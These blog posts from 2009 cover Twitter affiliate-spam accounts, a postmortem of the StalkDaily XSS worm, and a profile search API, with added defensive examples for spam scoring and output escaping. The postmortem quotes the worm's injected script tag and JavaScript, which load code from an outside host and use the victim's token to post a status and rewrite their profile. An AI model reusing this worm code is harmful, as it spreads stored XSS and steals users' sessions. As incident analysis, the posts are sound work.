Twitter Spam Evolution

Every once in a while I revisit Twitter Spam. It’s always interesting to see the evolution of spammers as it’s happened on other social networks before and their behavior on Twitter is similar.

Essentially, they get smarter. It’s as simple as that. Early spammers on Twitter would simply follow lots of people and send obviously spammy messages. Twitter put a cap on that with their follow limits. Spammers of course then gamed the system by figuring out who had auto-follow turned on and following those folks, as well as following regular people and unfollowing when the follow wasn’t reciprocated. Twitter has since begun disabling auto-follow, though other services exist and will keep popping up.

The latest iteration, which I’d seen evidence of before but only from the initial prep stage, is the “almost real” accounts. Let’s take a look at @james_mahoney.

Spam(?) Account on Twitter

Now this looks like a fairly normal account, tweeting about basketball and college. But let’s take a closer look at a couple of those messages, specifically because they might look a bit familiar…

Yup, that’s right. Those tweets are simply duplicates of tweets made earlier by other, real people. This account is simply duplicating them to appear legitimate. Now those links for the Kindle are starting to look a little suspicious, too. If we take a closer look, we notice that it’s a legitimate link to Amazon, but with the spammer’s associate code in the URL.

You can see that his account also looks real enough that people even engage in conversation.

So the associate code means this spammer will get a few bucks if somebody actually buys the Kindle. How many times does @James_Mahoney send out these tweets? About 200 out of 800 - just see for yourself. Even a few hits makes it worth it if this is automated in any fashion.

A final note - want to find some other accounts in the initial phase of this scam? Just click through some of the recent follower icons on @James_Mahoney’s page, particularly the ones with the default avatar - you’ll notice they all have an eerily similar set of first messages. Welcome to Social Network Spam.
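The signals described above (tweets copied verbatim from other, earlier accounts, plus Amazon links carrying an associate tag in a large share of the timeline) can be turned into a simple scoring heuristic. The following is an added example, not code from the original post; the tweets, handles, ASIN and affiliate tag value are all constructed, and the thresholds are assumptions chosen to roughly match the 200-of-800 ratio the post reports. The `tag` query parameter is the one Amazon Associates links use.

```javascript
// Added example (not from the original post): score a Twitter timeline for the
// "almost real" spam pattern: copied tweets plus affiliate-tagged Amazon links.

// Constructed corpus of earlier tweets by other, real accounts.
const earlierTweets = [
  { user: "realfan1", text: "Can't believe that buzzer beater last night" },
  { user: "student22", text: "Finals week is going to kill me" },
];

// Constructed timeline of the account under review. The ASIN and the
// affiliate tag are placeholders, not real values.
const suspectTimeline = [
  { user: "suspect", text: "Can't believe that buzzer beater last night" },
  { user: "suspect", text: "Finals week is going to kill me" },
  { user: "suspect", text: "Just got a Kindle http://www.amazon.com/dp/EXAMPLEASIN?tag=exampletag-20" },
  { user: "suspect", text: "Kindle is awesome http://www.amazon.com/dp/EXAMPLEASIN?tag=exampletag-20" },
  { user: "suspect", text: "Go team!" },
];

// Lower-case and collapse whitespace so trivial edits still match.
function normalize(text) {
  return text.toLowerCase().replace(/\s+/g, " ").trim();
}

function extractUrls(text) {
  return text.match(/https?:\/\/[^\s]+/g) || [];
}

// True for an Amazon link that carries an Associates "tag" parameter.
function hasAffiliateTag(url) {
  try {
    const u = new URL(url);
    const host = u.hostname.toLowerCase();
    const isAmazon = host === "amazon.com" || host.endsWith(".amazon.com");
    return isAmazon && u.searchParams.has("tag");
  } catch (e) {
    return false; // unparsable URL: not counted
  }
}

// Count tweets that duplicate someone else's earlier tweet, and tweets that
// carry an affiliate-tagged link; return counts and ratios.
function scoreAccount(timeline, corpus) {
  const seen = new Set();
  for (const t of corpus) {
    seen.add(t.user + "\u0000" + normalize(t.text));
  }
  let duplicated = 0;
  let affiliate = 0;
  for (const t of timeline) {
    const key = normalize(t.text);
    const copied = corpus.some(
      (c) => c.user !== t.user && normalize(c.text) === key
    );
    if (copied) duplicated += 1;
    if (extractUrls(t.text).some(hasAffiliateTag)) affiliate += 1;
  }
  const total = timeline.length;
  return {
    total,
    duplicated,
    affiliate,
    duplicateRatio: total ? duplicated / total : 0,
    affiliateRatio: total ? affiliate / total : 0,
  };
}

// Assumed thresholds: a fifth of the timeline copied AND a fifth pushing
// affiliate links is enough to flag for manual review.
function isLikelySpam(score, minDup = 0.2, minAff = 0.2) {
  return score.duplicateRatio >= minDup && score.affiliateRatio >= minAff;
}

const result = scoreAccount(suspectTimeline, earlierTweets);
console.log(result, "flag:", isLikelySpam(result));
```

Both signals are required before flagging: a real fan who retypes a friend's joke, or a real owner who posts one affiliate link, should not trip the check on its own.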

Thanks to Mike Dahn for the heads up on Mr. Spammy Spammer.

(p.s. Don’t forget to click my affiliate link to the right. ;))

Written on: 04-18-09 · 6 Comments

Twitter StalkDaily Worm Postmortem

Twitter got hit with a little security incident this afternoon we’ll call the “StalkDaily Worm”. I have no clue if the StalkDaily site was actually associated with the worm at this point or if it was simply a misdirection. I believe it to be the latter.

At around 3:43pm PST this afternoon I noticed some odd updates from a couple of my friends regarding the StalkDaily site. I then saw this tweet from @JoeCascio:

First virus-like hack of Twitter is StalkDaily.com. Looks like a code injection in the Location field of your profile.

Coming from Joe, I knew something was up. Looking at one of the infected profiles I saw a link to the StalkDaily site, but then also some script tags. These typically aren’t allowed as part of a profile URL and looked suspicious:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js>"

The script tag is the particularly bad part and is what was getting injected into people’s profiles. Taking a quick look at the JavaScript that it actually links to, there were a few lines in particular that caught my eye:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It’s a site like Twitter but with pictures, videos, and so much more! :)");
var xss = urlencode('http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ');

var ajaxConn = new XHConn();
ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");
ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

What’s happening here is that it looks like somebody realized they could save URL-encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing the Twitter profile page of somebody who was already infected. If you visited an infected profile, the JavaScript in the profile would execute and, by doing so, tweet the misleading link and update your own profile with the same malicious JavaScript, thereby infecting anybody who then visited your profile on twitter.com.
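To make the bug concrete: the field was stored and then dropped straight into an HTML attribute without escaping, so a value containing a closing quote and angle brackets became markup. The following is an added example, not Twitter’s code or the worm’s, showing that unescaped rendering beside a hardened version that escapes the value and only links http(s) URLs that parse cleanly. The payload is constructed to mimic the shape of the injected value; both hostnames are placeholders, not real domains.

```javascript
// Added example (not Twitter's code): the stored-XSS pattern the post describes,
// in a vulnerable renderer and a hardened one.

// Constructed payload of the same shape as the injected profile URL.
// Both hosts are placeholders in the reserved .invalid TLD.
const CONSTRUCTED_PAYLOAD =
  'http://example.invalid"></a><script src="http://script-host.invalid/x.js"></script><a ';

// Vulnerable: the stored value is interpolated directly into the attribute
// and the link text, so a quote in the value terminates the attribute.
function renderProfileLinkVulnerable(url) {
  return '<a href="' + url + '">' + url + '</a>';
}

// Escape the five characters that can break out of text or attributes.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[c]);
}

// Accept only http(s) URLs that the WHATWG URL parser accepts; return the
// normalized form, or null for anything else (javascript:, data:, garbage).
function safeUrl(url) {
  try {
    const u = new URL(url);
    if (u.protocol !== "http:" && u.protocol !== "https:") return null;
    return u.href;
  } catch (e) {
    return null;
  }
}

// Hardened: validate the scheme, then escape on output. A rejected value is
// still shown to the user, but only as escaped text, never as a link.
function renderProfileLinkSafe(url) {
  const ok = safeUrl(url);
  if (ok === null) return "<span>" + escapeHtml(url) + "</span>";
  return '<a href="' + escapeHtml(ok) + '">' + escapeHtml(ok) + "</a>";
}

// Small helper for checking rendered output.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

console.log("vulnerable:", renderProfileLinkVulnerable(CONSTRUCTED_PAYLOAD));
console.log("hardened:  ", renderProfileLinkSafe(CONSTRUCTED_PAYLOAD));
```

Escaping on output is the part that actually closes the hole; the scheme check is defence in depth against a `javascript:` URL, which escaping alone would leave clickable.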

This was a nasty little script.

This is also one of the reasons that I browse the web with NoScript. It’s a hassle, sure, but it prevented the script from an untrusted domain (uuuq.com) from running on Twitter.com.

As we’ve seen with worms in the past, this attack was loud and noisy and all the attackers did was collect your Twitter username and cookie. Had they been playing for real, a more profitable approach would have been to leave your profile URL intact and insert some JavaScript that turned your browser into an endpoint on a bot network. </doomandgloom>

It looks like Twitter has already taken care of the issue for the most part. Thanks to @al3x and crew for their near-instant response on what was likely a nice relaxing Saturday afternoon.

If you have the stalkdaily URL in your profile, you were likely attacked by this issue. Twitter has taken care of it at this point, so feel free to correct your URL and continue with your Saturday evening Twittering. There’s some more information on this post.

Be safe out there - the Internet is a dangerous place. :)

Update (2009-04-12): A brief update - another round of the worm hit Twitter on Sunday morning. It was effectively the same thing, but attacked a different field. The code, oddly enough, had also been run through an obfuscator. You can see the partially obfuscated code from the second worm here: second version of worm.

Written on: 04-11-09 · 46 Comments

Twitter Profile Search API

In the interest of making profile search more available to interested Twitter developers, I’ve added XML and JSON-formatted output to TweepSearch. Shown below is a simple example that allows you to query TweepSearch from any site using JSON callbacks. This is available free of charge for the time being, but if usage exceeds my current hosting capabilities I may start charging a small fee.

See the TweepSearch Help page for information on other search operators.


The quick hack of the JavaScript code that made this possible is on GitHub; feel free to steal it and make it better.

Written on: 04-07-09 · No Comments